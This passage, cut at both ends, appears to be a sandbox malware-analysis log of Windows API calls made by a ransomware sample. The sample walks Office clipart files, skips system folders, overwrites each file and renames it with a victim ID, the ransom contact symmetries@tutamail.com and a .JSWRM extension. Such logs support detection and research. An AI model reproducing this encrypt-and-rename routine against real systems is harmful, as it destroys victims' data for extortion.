dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0092.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0092.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0092.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.066] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01161_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01161_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0092.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.066] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5d0a20, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5d0a20, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5f6d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01164_.WMF", cAlternateFileName="")) returned 1 [0092.066] lstrcmpiW (lpString1="NA01164_.WMF", lpString2=".") returned 1 [0092.066] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="..") returned 1 [0092.067] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="...") returned 1 [0092.067] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="windows") returned -1 [0092.067] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="recovery") returned -1 [0092.067] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="perflogs") returned -1 [0092.067] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="documents and settings") returned 1 [0092.067] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.067] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="system volume information") returned -1 [0092.067] lstrcmpiW (lpString1="NA01164_.WMF", lpString2="msocache") returned 1 [0092.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01164_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01164_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01164_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0092.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01164_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01164_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01164_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0092.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0092.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01164_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.068] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2564) returned 1 [0092.068] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa00) returned 0x20c6c0 [0092.068] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa00, lpOverlapped=0x0) returned 1 [0092.070] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.070] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa00, lpOverlapped=0x0) returned 1 [0092.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0092.070] CloseHandle (hObject=0x314) returned 1 [0092.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0092.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0092.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0092.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0092.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0092.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.070] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01164_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01164_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0092.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0092.071] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5d0a20, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x70f0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01293_.WMF", cAlternateFileName="")) returned 1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2=".") returned 1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="..") returned 1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="...") returned 1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="windows") returned -1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="recovery") returned -1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="perflogs") returned -1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="documents and settings") returned 1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="system volume information") returned -1 [0092.071] lstrcmpiW (lpString1="NA01293_.WMF", lpString2="msocache") returned 1 [0092.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01293_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01293_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01293_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01293_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01293_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01293_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01293_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.073] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28912) returned 1 [0092.073] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70f0) returned 0x24d210 [0092.073] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x70f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x70f0, lpOverlapped=0x0) returned 1 [0092.076] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.076] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x70f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x70f0, lpOverlapped=0x0) returned 1 [0092.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.077] CloseHandle (hObject=0x314) returned 1 [0092.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0092.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0092.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0092.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0092.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.078] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01293_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01293_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.079] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01354_.WMF", cAlternateFileName="")) returned 1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2=".") returned 1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="..") returned 1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="...") returned 1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="windows") returned -1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="recovery") returned -1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="perflogs") returned -1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="documents and settings") returned 1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="system volume information") returned -1 [0092.079] lstrcmpiW (lpString1="NA01354_.WMF", lpString2="msocache") returned 1 [0092.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0092.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01354_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01354_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01354_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0092.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01354_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01354_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01354_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01354_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.080] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5806) returned 1 [0092.080] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16a0) returned 0x205850 [0092.080] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16a0, lpOverlapped=0x0) returned 1 [0092.082] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.082] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16a0, lpOverlapped=0x0) returned 1 [0092.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.083] CloseHandle (hObject=0x314) returned 1 [0092.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0092.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0092.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0092.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.083] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01354_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01354_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0092.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: 